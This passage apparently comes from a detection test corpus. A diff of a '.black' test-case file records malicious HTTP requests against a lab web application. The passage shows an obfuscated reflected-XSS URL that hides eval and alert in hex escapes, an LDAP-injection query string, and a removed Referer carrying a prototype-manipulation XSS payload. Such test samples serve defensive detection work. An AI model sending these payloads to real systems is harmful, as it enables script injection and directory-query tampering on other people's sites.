http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27window%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28window%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/ff/9b/d030430841b19bcc17c7bf60aea3.black b/testcases/ff/9b/d030430841b19bcc17c7bf60aea3.black index 5556afb99..2902972ab 100644 --- a/testcases/ff/9b/d030430841b19bcc17c7bf60aea3.black +++ b/testcases/ff/9b/d030430841b19bcc17c7bf60aea3.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?paramd6f70e=admin%2A%29%28%28%7Cuserpassword=%2A%29 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27x%27%5D%3Dconstructor.getOwnPropertyDescriptor%3Bg%3D%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27x%27%5D%3B%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27y%27%5D%3Dg%28%27%27.sub%5B%5B%27__proto__%27%5D%5D%2C%27constructor%27%29%3B%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27z%27%5D%3Dconstructor.defineProperty%3Bd%3D%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27z%27%5D%3Bd%28%27%27.sub%5B%5B%27__proto__%27%5D%5D%2C%27constructor%27%2C%7Bvalue%3Afalse%7D%29%3B%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27y%27%5D.value%28%27alert%281%29%27%29%28%29 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close